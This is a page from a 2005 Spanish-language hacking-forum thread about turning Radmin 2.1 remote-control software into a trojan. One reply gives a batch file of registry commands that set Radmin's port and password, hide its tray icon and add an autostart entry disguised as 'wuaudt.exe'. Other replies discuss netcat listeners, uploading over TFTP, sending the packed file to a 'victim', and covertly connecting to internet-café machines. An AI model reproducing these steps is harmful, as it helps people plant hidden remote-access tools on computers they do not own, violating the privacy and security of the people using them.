elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Troyanizando Radmin 2.1 control remoto
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 Ir Abajo Respuesta Imprimir
Autor Tema: Troyanizando Radmin 2.1 control remoto  (Leído 159,597 veces)
A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #30 en: 12 Mayo 2005, 20:23 pm »

que onda... Mira, haber si te puedo ayudar, yo tmb batalle en eso, eske no se mucho de programacion basika Jajajaja...
El Bat lo haces en el Note Pad, pero le pones de nombre por ejemplo "radmin.bat" o "hola.bat", pero que termine en BAT, pke sino se creara un simple archivo de texto.
despues...
Escribes todo el codigo, pero recuerda que tienes que cambiar el parametro de la contraseña... mira, observa el codigo


REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "aki va el codigo que representa el puerto que kieras"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "aki va la contraseña que hayas escogido"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaudt /t REG_SZ /d "C:\windows\system32\wuaudt.exe"

... Este lo guardas en cualkier karpeta de tu pc, y a la hora de que estes agregando el comando de consola escoges el archivo que kreaste (EL BAT)... Y pues lo demas creo que si sabes como hacerlo vdd?
Como kiera... Si tienes alguna duda aki tienes mi mail
Xtreme_Modding@Hotmail.com

Espero haberte ayudado :)
En línea

Hackeo, luego existo...
jojo1

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Troyanizando Radmin 2.1 control remoto
« Respuesta #31 en: 17 Mayo 2005, 00:44 am »

mira pana yo instale el programa pero yegue hasta la parte de citar:
reg add HKEY_LOCAL_MACHINE........ DIME QUE ES ESO?
[/font]
En línea

jojo1

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #32 en: 17 Mayo 2005, 01:03 am »

soy super novato
hola ocldth te felicito por tu archivo pero tengo un problema y es ¿como subo eso via tftp?
En línea

cazandomoscas

Desconectado Desconectado

Mensajes: 1


Ver Perfil
octalh Troyanizando Radmin 2.1 control remoto
« Respuesta #33 en: 18 Mayo 2005, 19:55 pm »

Hola octalh colega, soy novoto en esto y quiero poder mandarte un manual para que tu lo revises y si estas deacuerdo me lo confirmes, te ruego me digas tu e-mail para hacertelo llegar.

Yo he seguido todos estos pasos y no consigo troyanizar el radmin.

Te ruego me digas en que fallo y sobre todo si no fallo en nada decirme si con este manual puedo acceder a IP's especificas dentro de una red local desde donde yo este y con IP dinamica.

Un saludo.
Eres cojonudo.

« Última modificación: 18 Mayo 2005, 19:58 pm por cazandomoscas » En línea

Keydash

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #34 en: 23 Mayo 2005, 23:22 pm »

Aun llegando tarde aeste post comento mis preguntas,

osea el si diesese la casualidad de que el netcat intenta conectar antes de que el user inicie la conexion a internet entonces ¿que pasaria? se enviaria? netcat seguiria intentandolo? etc

La otra es que puse como mi ip un dominio no-ip, aun no he hecho pruebas, pero pregunto ya si funcionaria con el netcat.

Y eso es todo, ante todo felicitar a octalh por este tutorial
En línea

sammic

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #35 en: 27 Mayo 2005, 20:46 pm »

Ante todo muchas felicitaciones a octalh por este tutorial es bueno reconocer lo que eres y como decimos en mi pais ( eres el webo que aletea en la noche ) en fin he leido toda esta parte de troyanizar el radmin y al parecer grax a tu tutorial se ve facil ... claro no entiendo eso de subir archivos por tftp pero lo de hacer un ejecutable kon todo me parece mejor el problem es que el link para bajarce el ipacker 20tool esta roto o nose que si me lo puedes mandar a mi correo o alguien me lo pueda mandar eso si sin regalitos extras ... se lo agradeceria un monton mi correo es conoelamadre@hotmail.com grax
En línea

sammic

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #36 en: 30 Mayo 2005, 22:09 pm »

Hola Bueno soy yo otra vez ya hice todo lo que decia octalh y y me he leido todas las comversaciones de esta parte de troyaniar el radmin se veia facil pero.... me esta costando demasiado ya llevo 4 dias durmiendo solo 3 horas y solo pensando en que fallo ... en fin mi falla es en la que komenta el usuario 1000101 a la final logro konectar kon la victima por netcat o msdos pero no logro conectarme por el radmin la cuestion es que conectarme con una victima kon ip directa no es lo que me interesa si no lo de conectarme a un ciber ... mi esposa trabaja en un ciber y lo hemos estando intentando de mil maneras por los 9829852895 puertos existentes  y no hay manera de conectarme por el radmin solo konecta por el netcat ... todo lo he hecho textualmente pero nada de nada por favor ayudenme diganme cual es mi fallo solo quiero konectarme a un par de ciber ... en el caso de donde trabaja mi esposa solo logro konectarme por netcat pero si logra conectar por el netcat dentro de un ciber me imagino que tambien deberia conectar por el radmin de verdad a los usuarios ados y chemo y al usuario 1000101 si logro porfavor  ayudenme   ... a la final creo que mi error es el mismo que tiene el usurario cazandomoscas por favor mandeme su telefono o un correo o que se yo ... yo los llamo pa que me expliken mejor o para aclarar ciertas dudas por telefono de verdad me interesa mucho poder hacerlo  y gracias de ante mano
En línea

halmay

Desconectado Desconectado

Mensajes: 30


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #37 en: 7 Junio 2005, 10:00 am »

Alguien podria decirme como configurar el tftpd32 para subir via tftp?

Solamente me falta eso...

muchas gracias
En línea

frivas22

Desconectado Desconectado

Mensajes: 2



Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #38 en: 8 Junio 2005, 00:28 am »

hola. excelente el proceso, pero tengo una duda. como hago para modificar los registros en qin98? ya que con el .bat no pude. gracias.
En línea

halmay

Desconectado Desconectado

Mensajes: 30


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #39 en: 9 Junio 2005, 10:40 am »

ya he conseguido hacer el archivo...
pero lo he mandado a un amigo como prueba... este lo ha abierto y yo he abierto el netcat he puesto -L -p 1717 -vv
Me dice
listening on (any) 7171 y no pasa de esto...

que puedo tener mal

Gracias
« Última modificación: 9 Junio 2005, 17:33 pm por halmay » En línea

Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines